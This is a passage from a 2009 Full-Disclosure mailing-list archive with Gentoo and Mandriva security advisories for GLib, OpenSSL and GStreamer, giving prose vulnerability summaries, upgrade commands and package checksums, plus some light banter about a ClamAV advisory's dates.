      Date: April 03, 2009
      Bugs: #249214
        ID: 200904-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows might allow for the execution of arbitrary
code when performing base64 conversion.

Background
==========

The GLib is a library of C routines that is used by a multitude of
programs.

Affected packages
=================

    -------------------------------------------------------------------
     Package        /   Vulnerable   /                      Unaffected
    -------------------------------------------------------------------
  1  dev-libs/glib      < 2.18.4-r1                       >= 2.18.4-r1
                                                         *>= 2.16.6-r1

Description
===========

Diego E. Petten? reported multiple integer overflows in glib/gbase64.c
when converting a long string from or to a base64 representation.

Impact
======

A remote attacker could entice a user or automated system to perform a
base64 conversion via an application using GLib, possibly resulting in
the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GLib 2.18 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.18.4-r1"

All GLib 2.16 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.16.6-r1"

References
==========

  [ 1 ] CVE-2008-4316
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4316

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090403/69a8eda8/attachment.bin 

From 300baud at gmail.com  Fri Apr  3 14:53:18 2009
From: 300baud at gmail.com (Line Noise)
Date: Fri, 3 Apr 2009 06:53:18 -0700
Subject: [Full-disclosure] Black Hat USA Videos available to D/L
In-Reply-To: <f8485157fbb8511a35c2b3a15fee65ea.squirrel@meteor.procyonlabs.com>
References: <20090331003904.2CC0C707@lists.grok.org.uk>
	<f8485157fbb8511a35c2b3a15fee65ea.squirrel@meteor.procyonlabs.com>
Message-ID: <739e7bb20904030653v2c35fb2am341e309ffeb9b38d@mail.gmail.com>

On 4/2/09, Randal T. Rioux <randy at procyonlabs.com> wrote:
> On Mon, March 30, 2009 8:14 pm, jmoss wrote:
>
>  > Hey Full Disclosure,
>  >
>  > I am proud to announce that the audio and video from BH USA 2008 is now
>  > available for free download, and is in several formats, the first of which
>  > is a large, hi-res format with video-sync speaker and presentation:
>  <snip>

>  .m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come
>  back to the DC-stuff mailing list so we can discuss this :-)

Oh, you are the funny guy. Jeff is still on the list. He probably just
sends all the posts to /dev/null

-- 
It's Full Disclosure.
Post the disclosure here, not on your website.
You may not have a web site tomorrow.



From ro0ot.w00t at googlemail.com  Fri Apr  3 16:52:33 2009
From: ro0ot.w00t at googlemail.com (Jan G.B.)
Date: Fri, 3 Apr 2009 17:52:33 +0200
Subject: [Full-disclosure] [TZO-05-2009] Clamav 0.94 and below - Evasion
	/bypass
In-Reply-To: <1954437740.20090402162754@Zoller.lu>
References: <1954437740.20090402162754@Zoller.lu>
Message-ID: <c9a09d00904030852o4086c279odaed7227d906b285@mail.gmail.com>

hmm, I'm jealous: where can we get this time-travel machine?

2009/4/2 Thierry Zoller <Thierry at zoller.lu>:
> 13/03/2009 : Clamav responds that the bug is reproducible and will be
>             fixed in 0.95 to be released the 23/03/2009
> 23/05/2009 : Asked clamav if the release was made and if credit was
> ? ? ? ? ? ? given
>
> 23/05/2009 : Clamav responds that the release was made, and that the
> ? ? ? ? ? ? credit was given in the changelog. (Tzo note: A post will
> ? ? ? ? ? ? be probably be made at http://www.clamav.net/category/security/
>
> 02/01/2009 : Release of this limited detail advisory



From Thierry at Zoller.lu  Fri Apr  3 18:20:01 2009
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 3 Apr 2009 19:20:01 +0200
Subject: [Full-disclosure] [TZO-05-2009] Clamav 0.94 and below - Evasion
	/bypass
In-Reply-To: <c9a09d00904030852o4086c279odaed7227d906b285@mail.gmail.com>
References: <1954437740.20090402162754@Zoller.lu>
	<c9a09d00904030852o4086c279odaed7227d906b285@mail.gmail.com>
Message-ID: <109878730.20090403192001@Zoller.lu>


JGB> hmm, I'm jealous: where can we get this time-travel machine?

It's open source, grab it at your local oss repositry. apt-get install
timetravel

JGB> 2009/4/2 Thierry Zoller <Thierry at zoller.lu>:
>> 13/03/2009 : Clamav responds that the bug is reproducible and will be
>>             fixed in 0.95 to be released the 23/03/2009
>> 23/05/2009 : Asked clamav if the release was made and if credit was
>> ? ? ? ? ? ? given
>>
>> 23/05/2009 : Clamav responds that the release was made, and that the
>> ? ? ? ? ? ? credit was given in the changelog. (Tzo note: A post will
>> ? ? ? ? ? ? be probably be made at http://www.clamav.net/category/security/
>>
>> 02/01/2009 : Release of this limited detail advisory



-- 
http://secdev.zoller.lu
Thierry Zoller



From security at mandriva.com  Fri Apr  3 23:39:01 2009
From: security at mandriva.com (security at mandriva.com)
Date: Sat, 04 Apr 2009 00:39:01 +0200
Subject: [Full-disclosure] [ MDVSA-2009:087 ] openssl
Message-ID: <E1Lps2P-0001qy-BZ@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:087
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openssl
 Date    : April 3, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A security vulnerability has been identified and fixed in OpenSSL,
 which could crash applications using OpenSSL library when parsing
 malformed certificates (CVE-2009-0590).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 6b754c91594c65b327d2dba0c7402d55  2008.0/i586/libopenssl0.9.8-0.9.8e-8.3mdv2008.0.i586.rpm
 7925aa846daa02085d8261e17f2f5875  2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.3mdv2008.0.i586.rpm
 051e206025736be6aca4e5b2a57b8f94  2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.3mdv2008.0.i586.rpm
 01f56e6d5ee540090fbee6d34f29e65a  2008.0/i586/openssl-0.9.8e-8.3mdv2008.0.i586.rpm 
 c70caa3e4c03412a02cc6bbb36902382  2008.0/SRPMS/openssl-0.9.8e-8.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 bffedd1a3568c6756f2a7e208711406b  2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.3mdv2008.0.x86_64.rpm
 bdd18bfb34dc3fe03ab0427eaa998762  2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.3mdv2008.0.x86_64.rpm
 c1966f47b75d196587ba1bbebeb36de6  2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.3mdv2008.0.x86_64.rpm
 2d0ee52fbbe9736e3e36d0af3eccfab4  2008.0/x86_64/openssl-0.9.8e-8.3mdv2008.0.x86_64.rpm 
 c70caa3e4c03412a02cc6bbb36902382  2008.0/SRPMS/openssl-0.9.8e-8.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 dc492cf18385aabfb94663b1a121a776  2008.1/i586/libopenssl0.9.8-0.9.8g-4.3mdv2008.1.i586.rpm
 bb4d4453048fb8f68fa3d4acaddaa0c8  2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.3mdv2008.1.i586.rpm
 ad22bc2ee1d238606133616104420669  2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.3mdv2008.1.i586.rpm
 f7f7edf2ca2e1422d718a40c2c14419b  2008.1/i586/openssl-0.9.8g-4.3mdv2008.1.i586.rpm 
 e032c64f27cc35e9c72c9ee1d28dfaf3  2008.1/SRPMS/openssl-0.9.8g-4.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 77d9d1e7f5dc49dec60c69cc1b028463  2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.3mdv2008.1.x86_64.rpm
 0bcee0a1c173a8f5d8e8adbb81708a6c  2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.3mdv2008.1.x86_64.rpm
 cb5ff411ea8180862e0d411239c76341  2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.3mdv2008.1.x86_64.rpm
 02c72439aa06c9310494b17ebc676e0c  2008.1/x86_64/openssl-0.9.8g-4.3mdv2008.1.x86_64.rpm 
 e032c64f27cc35e9c72c9ee1d28dfaf3  2008.1/SRPMS/openssl-0.9.8g-4.3mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 4ec73f053278a9c77ccd62034a1e4c72  2009.0/i586/libopenssl0.9.8-0.9.8h-3.2mdv2009.0.i586.rpm
 33da38ad5f20eec511a60b5b476cf241  2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.2mdv2009.0.i586.rpm
 70f6020e9fe66badabf815f7256b9718  2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.2mdv2009.0.i586.rpm
 8f87c9a8339052d4c261cfd818486c1d  2009.0/i586/openssl-0.9.8h-3.2mdv2009.0.i586.rpm 
 44980fee28c99bb22012e36e88eeaec7  2009.0/SRPMS/openssl-0.9.8h-3.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 18b0da8ae3998bb143efbe9fbf78282d  2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.2mdv2009.0.x86_64.rpm
 01310fb6273e795489023f02d71434d4  2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.2mdv2009.0.x86_64.rpm
 2da04ce75c2371f1ee15d94742f00ee6  2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.2mdv2009.0.x86_64.rpm
 5529205245e554324f40c87ba665b198  2009.0/x86_64/openssl-0.9.8h-3.2mdv2009.0.x86_64.rpm 
 44980fee28c99bb22012e36e88eeaec7  2009.0/SRPMS/openssl-0.9.8h-3.2mdv2009.0.src.rpm

 Corporate 3.0:
 1b58ced1478d63969727c9346305e20d  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.10.C30mdk.i586.rpm
 3ebb9340042ad4fbf9664ba47148fd59  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.10.C30mdk.i586.rpm
 c57397a9e6773866c58d11af8b9599a4  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.10.C30mdk.i586.rpm
 feaecf68067dd7d75cf30790b0702338  corporate/3.0/i586/openssl-0.9.7c-3.10.C30mdk.i586.rpm 
 47da419d4ed666fcb064635be15a6450  corporate/3.0/SRPMS/openssl-0.9.7c-3.10.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c567e5f61d5cae04b02bfa43d307cf95  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.10.C30mdk.x86_64.rpm
 4c487ef9f195ac905d8e27a2ee5a3aad  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.10.C30mdk.x86_64.rpm
 11faa9b02898eaec3d346e56c2c37567  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.10.C30mdk.x86_64.rpm
 0485fbcd4bb28224e6716114eb6dd372  corporate/3.0/x86_64/openssl-0.9.7c-3.10.C30mdk.x86_64.rpm 
 47da419d4ed666fcb064635be15a6450  corporate/3.0/SRPMS/openssl-0.9.7c-3.10.C30mdk.src.rpm

 Corporate 4.0:
 72db90b1c8362f8122bb29101e8f7ea3  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.8.20060mlcs4.i586.rpm
 2957dac9e5461336cf68433f4b147de1  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.8.20060mlcs4.i586.rpm
 e0f441e9cf9c18321f4e8b3099c2df5a  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.8.20060mlcs4.i586.rpm
 4a020ff36ff58d2ae9ccfc852f265d1d  corporate/4.0/i586/openssl-0.9.7g-2.8.20060mlcs4.i586.rpm 
 12bd0d350017d5ad4930beaad07e2a92  corporate/4.0/SRPMS/openssl-0.9.7g-2.8.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 b8c7201ae9c41aa0f391f877da24e312  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.8.20060mlcs4.x86_64.rpm
 d9329b8d694a37cd24d3e2373eb02066  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.8.20060mlcs4.x86_64.rpm
 e9c6bd67410f238a0b775361e08e7af3  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.8.20060mlcs4.x86_64.rpm
 88d42200e0464824e003ce4451a175e7  corporate/4.0/x86_64/openssl-0.9.7g-2.8.20060mlcs4.x86_64.rpm 
 12bd0d350017d5ad4930beaad07e2a92  corporate/4.0/SRPMS/openssl-0.9.7g-2.8.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 74728af83737762b744092597629e1db  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.10.C30mdk.i586.rpm
 0de1c4403ddbba33f21a99e2879af9cc  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.10.C30mdk.i586.rpm
 3b79e5cdb909115e3770ee59a17f757a  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.10.C30mdk.i586.rpm
 39b67cff96aaa016f119d5ddff312f54  mnf/2.0/i586/openssl-0.9.7c-3.10.C30mdk.i586.rpm 
 1201abd42759b7e5a0d96aa4f96a9dd1  mnf/2.0/SRPMS/openssl-0.9.7c-3.10.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJ1mJMmqjQ0CJFipgRAq43AJ427ntOrRUUUgRlx1AwCldUE/rFygCfQu5Y
I9/Hqbyeksi2w0SLyVMPeMw=
=+BmT
-----END PGP SIGNATURE-----



From security at mandriva.com  Sat Apr  4 01:27:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Sat, 04 Apr 2009 02:27:00 +0200
Subject: [Full-disclosure] [ MDVSA-2009:086 ] gstreamer-plugins
Message-ID: <E1Lptiu-0001xb-SP@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:086
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gstreamer-plugins
 Date    : April 3, 2009
 Affected: Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 An array indexing error in the GStreamer's QuickTime media file
 format decoding plug-in enables attackers to crash the application
 and potentially execute arbitrary code by using a crafted media file
 (CVE-2009-0398).
 
 This update provides fix for that security issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0398
 _______________________________________________________________________

 Updated Packages:

 Corporate 3.0:
 7b4be0cc6785817d1ff5c59b60c5f331  corporate/3.0/i586/gstreamer-a52dec-0.6.4-4.2mdk.i586.rpm
 294392663723cf50cb7e173cdd23e160  corporate/3.0/i586/gstreamer-aalib-0.6.4-4.2mdk.i586.rpm
 b8637d2173ca121a31b21197dcb2cf7a  corporate/3.0/i586/gstreamer-arts-0.6.4-4.2mdk.i586.rpm
 7a317d7723978794cdde25db3c1462fa  corporate/3.0/i586/gstreamer-artsd-0.6.4-4.2mdk.i586.rpm
 79b5a682bc1c98302c0dc68b4d464c27  corporate/3.0/i586/gstreamer-audio-effects-0.6.4-4.2mdk.i586.rpm
 5a691b3c1dd5a9c0bef53e425ce4851b  corporate/3.0/i586/gstreamer-audiofile-0.6.4-4.2mdk.i586.rpm
 0feda5ed5b3c8047e93fdf5cd19c8ff5  corporate/3.0/i586/gstreamer-audio-formats-0.6.4-4.2mdk.i586.rpm
 b1e1f7bbab5f3ddde291518cc171de65  corporate/3.0/i586/gstreamer-avi-0.6.4-4.2mdk.i586.rpm
 685c0e290bd25cfb1157a4000d052f5d  corporate/3.0/i586/gstreamer-cdparanoia-0.6.4-4.2mdk.i586.rpm
 9420a443aecf206dcdeea594e58e1277  corporate/3.0/i586/gstreamer-cdplayer-0.6.4-4.2mdk.i586.rpm
 96a5fc6dec0977dc5b1011bd05c2f645  corporate/3.0/i586/gstreamer-colorspace-0.6.4-4.2mdk.i586.rpm
 caab9a6306d918c050e8de8d826fd209  corporate/3.0/i586/gstreamer-dv-0.6.4-4.2mdk.i586.rpm
 73a9cab8ce50d8af5ca08e24350938ce  corporate/3.0/i586/gstreamer-dxr3-0.6.4-4.2mdk.i586.rpm
 b99c0903fa4c408dc9bf14b215a9606f  corporate/3.0/i586/gstreamer-esound-0.6.4-4.2mdk.i586.rpm
 5da33082cf9027b2a0ec151fdf41be66  corporate/3.0/i586/gstreamer-festival-0.6.4-4.2mdk.i586.rpm
 02c4cf9d7e166f7c4556abd7c72b42cb  corporate/3.0/i586/gstreamer-ffmpeg-0.6.4-4.2mdk.i586.rpm
 c8219bc30ff8d16ad12116a22973e12b  corporate/3.0/i586/gstreamer-flac-0.6.4-4.2mdk.i586.rpm
 af5af2862c4a9e16a53e2a8ca997c9ab  corporate/3.0/i586/gstreamer-flx-0.6.4-4.2mdk.i586.rpm
 6657d5e12e0c5e6d2840e1a02abd949b  corporate/3.0/i586/gstreamer-GConf-0.6.4-4.2mdk.i586.rpm
 ce2eca34c4958b279f1d87e08d2dd76e  corporate/3.0/i586/gstreamer-gnomevfs-0.6.4-4.2mdk.i586.rpm
 f12f5afb995ca42028716aab35c5962f  corporate/3.0/i586/gstreamer-gsm-0.6.4-4.2mdk.i586.rpm
 16397ee314a0c8d4434062b1c7a574ed  corporate/3.0/i586/gstreamer-httpsrc-0.6.4-4.2mdk.i586.rpm
 f31ba254382b0dad9f3ded0afa7600d4  corporate/3.0/i586/gstreamer-jack-0.6.4-4.2mdk.i586.rpm
 350bdddc34f43c88ad5b7a0fb1e9ccc1  corporate/3.0/i586/gstreamer-jpeg-0.6.4-4.2mdk.i586.rpm
 c2ec5cb20a944b4d6ac03b221ac28051  corporate/3.0/i586/gstreamer-jpegmmx-0.6.4-4.2mdk.i586.rpm
 2f30f3425d341f47c1d74abadc528bd1  corporate/3.0/i586/gstreamer-ladspa-0.6.4-4.2mdk.i586.rpm
 33eda1029d1e97a8571516f452297685  corporate/3.0/i586/gstreamer-libdvdnav-0.6.4-4.2mdk.i586.rpm
 2868b45a7465dcc74b94eb0a1a675af6  corporate/3.0/i586/gstreamer-libdvdread-0.6.4-4.2mdk.i586.rpm
 82bcd0f1319d76b091a974fa3708bd91  corporate/3.0/i586/gstreamer-libpng-0.6.4-4.2mdk.i586.rpm
 512a59310e2e294e98af6d18f21fabdd  corporate/3.0/i586/gstreamer-mad-0.6.4-4.2mdk.i586.rpm
 b9d56e3b7ed8842df47def11848e722a  corporate/3.0/i586/gstreamer-mikmod-0.6.4-4.2mdk.i586.rpm
 2a2700c8eae36344e0e7185171af5265  corporate/3.0/i586/gstreamer-mpeg-0.6.4-4.2mdk.i586.rpm
 7855681c3a429dbf792243fef2ff3e11  corporate/3.0/i586/gstreamer-oss-0.6.4-4.2mdk.i586.rpm
 ac2fb1432a4a04d6a7e0ee35f22baf74  corporate/3.0/i586/gstreamer-plugins-0.6.4-4.2mdk.i586.rpm
 908f505adf4665e42f01513f94c7aa6e  corporate/3.0/i586/gstreamer-plugins-devel-0.6.4-4.2mdk.i586.rpm
 79cb79bd6b47b9f000b9d74b31fc7f7b  corporate/3.0/i586/gstreamer-qcam-0.6.4-4.2mdk.i586.rpm
 bf74ca06ea867fa48daa58dba9c6cd22  corporate/3.0/i586/gstreamer-quicktime-0.6.4-4.2mdk.i586.rpm
 bf03b8ccf9abc84467908960b2e255d5  corporate/3.0/i586/gstreamer-raw1394-0.6.4-4.2mdk.i586.rpm
 1b69687109f36445e8da9b3f6f650a73  corporate/3.0/i586/gstreamer-SDL-0.6.4-4.2mdk.i586.rpm
 4e4fcf4562d5cf13da8ccfc437fbe054  corporate/3.0/i586/gstreamer-sid-0.6.4-4.2mdk.i586.rpm
 c6b611202a8bcfcab35e7aa858b187e6  corporate/3.0/i586/gstreamer-snapshot-0.6.4-4.2mdk.i586.rpm
 43938dd98357131c74dfcea9f7e68271  corporate/3.0/i586/gstreamer-swfdec-0.6.4-4.2mdk.i586.rpm
 e564e68c934e6b4ade28dd66ec34b27d  corporate/3.0/i586/gstreamer-udp-0.6.4-4.2mdk.i586.rpm
 121e44e193ecb7ab42117c5400a76e6a  corporate/3.0/i586/gstreamer-v4l-0.6.4-4.2mdk.i586.rpm
 2501bf4f1df721ffbcd923f0e1f28e69  corporate/3.0/i586/gstreamer-vcd-0.6.4-4.2mdk.i586.rpm
 b431cb4835b61b1e78098a5b0489eec2  corporate/3.0/i586/gstreamer-video-effects-0.6.4-4.2mdk.i586.rpm
 196a9ba5b5c8d6a824f0b620c3b7fd8f  corporate/3.0/i586/gstreamer-videosink-0.6.4-4.2mdk.i586.rpm
 7eea07fbffcd2e7fd673116be541bb1d  corporate/3.0/i586/gstreamer-videotest-0.6.4-4.2mdk.i586.rpm
 d0271086e326cdfb878fd63cb5e990b7  corporate/3.0/i586/gstreamer-visualisation-0.6.4-4.2mdk.i586.rpm
 dc79b9b2facfdf6c37df56c54b407b21  corporate/3.0/i586/gstreamer-vorbis-0.6.4-4.2mdk.i586.rpm
 6961d0e5b7243a8b57d510bb7153eaa2  corporate/3.0/i586/gstreamer-xvideosink-0.6.4-4.2mdk.i586.rpm
 3f736b943345e07084657520c34220e5  corporate/3.0/i586/gstreamer-yuv4mjpeg-0.6.4-4.2mdk.i586.rpm
 6d3228f0186eaccbc871d358c483890f  corporate/3.0/i586/libgstgconf0.6-0.6.4-4.2mdk.i586.rpm
 0b848c79c49c2b82f1290ed4176646b3  corporate/3.0/i586/libgstplay0.6-0.6.4-4.2mdk.i586.rpm 
 e9f225788d97dd5611a8da50bbb4bb97  corporate/3.0/SRPMS/gstreamer-plugins-0.6.4-4.2mdk.src.rpm

 Corporate 3.0/X86_64:
 cf86397083aaf82d03ed5f8a7fdc3b3b  corporate/3.0/x86_64/gstreamer-a52dec-0.6.4-4.2mdk.x86_64.rpm
 7a28854021710df2d2dfb0218ba0bacf  corporate/3.0/x86_64/gstreamer-aalib-0.6.4-4.2mdk.x86_64.rpm
 82876ee7754810bbd0117acabe2ef313  corporate/3.0/x86_64/gstreamer-arts-0.6.4-4.2mdk.x86_64.rpm
 555a9f2d41de248d3143e1f80adbb3b3  corporate/3.0/x86_64/gstreamer-artsd-0.6.4-4.2mdk.x86_64.rpm
 4dd6712ebafb1e814b8fd1bfbe4b41fd  corporate/3.0/x86_64/gstreamer-audio-effects-0.6.4-4.2mdk.x86_64.rpm
 eed567dc6abaa126effeaae9e18240d2  corporate/3.0/x86_64/gstreamer-audiofile-0.6.4-4.2mdk.x86_64.rpm
 7ed153b13ab098203a29b8039a03cfcd  corporate/3.0/x86_64/gstreamer-audio-formats-0.6.4-4.2mdk.x86_64.rpm
 f93b229de3917dc251ee564dc2a1f9e4  corporate/3.0/x86_64/gstreamer-avi-0.6.4-4.2mdk.x86_64.rpm
 84fba1c782746bb4a0ee12cf8c2712d8  corporate/3.0/x86_64/gstreamer-cdparanoia-0.6.4-4.2mdk.x86_64.rpm
 cf7c22223cbbba95c171a65b8ce2925b  corporate/3.0/x86_64/gstreamer-cdplayer-0.6.4-4.2mdk.x86_64.rpm
 88bbbc7aa4089641840dcfeef1cb8e57  corporate/3.0/x86_64/gstreamer-colorspace-0.6.4-4.2mdk.x86_64.rpm
 a56b349287d7d410d66a18936e3bf9ad  corporate/3.0/x86_64/gstreamer-dv-0.6.4-4.2mdk.x86_64.rpm
 fe0550b32b491e2be2125ce41f11be6e  corporate/3.0/x86_64/gstreamer-dxr3-0.6.4-4.2mdk.x86_64.rpm
 83bfe86ef019591b729b3444523c3267  corporate/3.0/x86_64/gstreamer-esound-0.6.4-4.2mdk.x86_64.rpm
 4bc6e155877dbafe3d78fc73267a5696  corporate/3.0/x86_64/gstreamer-festival-0.6.4-4.2mdk.x86_64.rpm
 d11c1c22889f3c5693b807a1bb5c96fe  corporate/3.0/x86_64/gstreamer-ffmpeg-0.6.4-4.2mdk.x86_64.rpm
 32101145b9ddef7f6e6f6f1d6dca9b94  corporate/3.0/x86_64/gstreamer-flac-0.6.4-4.2mdk.x86_64.rpm
 72f152dbb40dd6db6ec2625675eb774e  corporate/3.0/x86_64/gstreamer-flx-0.6.4-4.2mdk.x86_64.rpm
 2c1612695306cf513e9f16589a0e32b4  corporate/3.0/x86_64/gstreamer-GConf-0.6.4-4.2mdk.x86_64.rpm
 2c37cc3a2b9ba274d94747a385c07ad2  corporate/3.0/x86_64/gstreamer-gnomevfs-0.6.4-4.2mdk.x86_64.rpm
 d32263e0380c40c7d6587df1a2307d97  corporate/3.0/x86_64/gstreamer-gsm-0.6.4-4.2mdk.x86_64.rpm
 6324107ebc113ca6dbff39802e70c64c  corporate/3.0/x86_64/gstreamer-httpsrc-0.6.4-4.2mdk.x86_64.rpm
 d740bf51291dfeb3c30af5dfcfa01173  corporate/3.0/x86_64/gstreamer-jack-0.6.4-4.2mdk.x86_64.rpm
 444d2b92e050c15e58d4a1608cacc73c  corporate/3.0/x86_64/gstreamer-jpeg-0.6.4-4.2mdk.x86_64.rpm
 6e05620b20f9bf9e3150c970f3a6a006  corporate/3.0/x86_64/gstreamer-jpegmmx-0.6.4-4.2mdk.x86_64.rpm
 e9feedd03c8eab60ed6b0a959605d5f4  corporate/3.0/x86_64/gstreamer-ladspa-0.6.4-4.2mdk.x86_64.rpm
 ba96e950032872891f687ce1ff2788a4  corporate/3.0/x86_64/gstreamer-libdvdnav-0.6.4-4.2mdk.x86_64.rpm
 8d3d77bad5dc74fe83f0f54cfc33308c  corporate/3.0/x86_64/gstreamer-libdvdread-0.6.4-4.2mdk.x86_64.rpm
 7eea3c7aca8845d97fe01cd3863ae9de  corporate/3.0/x86_64/gstreamer-libpng-0.6.4-4.2mdk.x86_64.rpm
 8001f0e188454f3379ef824ae2708084  corporate/3.0/x86_64/gstreamer-mad-0.6.4-4.2mdk.x86_64.rpm
 101f2acb1ab238f3a6f05baa25730296  corporate/3.0/x86_64/gstreamer-mikmod-0.6.4-4.2mdk.x86_64.rpm
 faea588daf3b4383be7d26105902a440  corporate/3.0/x86_64/gstreamer-mpeg-0.6.4-4.2mdk.x86_64.rpm
 6bd4e4b95af116b7e72ef9d17b1d0b47  corporate/3.0/x86_64/gstreamer-oss-0.6.4-4.2mdk.x86_64.rpm
 d02bb7eace03146f48aeb2cbc83e4eb5  corporate/3.0/x86_64/gstreamer-plugins-0.6.4-4.2mdk.x86_64.rpm
 63d0c5454ddf2e45f9d0f0b1966511c6  corporate/3.0/x86_64/gstreamer-plugins-devel-0.6.4-4.2mdk.x86_64.rpm
 5320b13d4b23430655169941b4e23ef6  corporate/3.0/x86_64/gstreamer-quicktime-0.6.4-4.2mdk.x86_64.rpm
 871d19fc5c7597118120dcf5613cb4de  corporate/3.0/x86_64/gstreamer-raw1394-0.6.4-4.2mdk.x86_64.rpm
 0e1bf5001b9f7ae203ff19efc6405152  corporate/3.0/x86_64/gstreamer-SDL-0.6.4-4.2mdk.x86_64.rpm
 6e8d6b67f93fa256c368b21ecd1f62d6  corporate/3.0/x86_64/gstreamer-sid-0.6.4-4.2mdk.x86_64.rpm
 0007c08b1dc6711dc9178232fbf6a263  corporate/3.0/x86_64/gstreamer-snapshot-0.6.4-4.2mdk.x86_64.rpm
 af9c4e657e288e57180c854369299fe6  corporate/3.0/x86_64/gstreamer-swfdec-0.6.4-4.2mdk.x86_64.rpm
 c7edfc5a251d986ea72462b2427bef12  corporate/3.0/x86_64/gstreamer-udp-0.6.4-4.2mdk.x86_64.rpm
 f1d9e602a3f9b4eeedc6f4dbff27f8e6  corporate/3.0/x86_64/gstreamer-v4l-0.6.4-4.2mdk.x86_64.rpm
 2b84d6e223ca03a1a64642de2cd188a9  corporate/3.0/x86_64/gstreamer-vcd-0.6.4-4.2mdk.x86_64.rpm
 7b654979b403c4af4b8ed5cafc40195c  corporate/3.0/x86_64/gstreamer-video-effects-0.6.4-4.2mdk.x86_64.rpm
 8a9307f3e0a40d2c7d3806ac67594439  corporate/3.0/x86_64/gstreamer-videosink-0.6.4-4.2mdk.x86_64.rpm
 21b7563718bba6fa8511c6facbc49777  corporate/3.0/x86_64/gstreamer-videotest-0.6.4-4.2mdk.x86_64.rpm
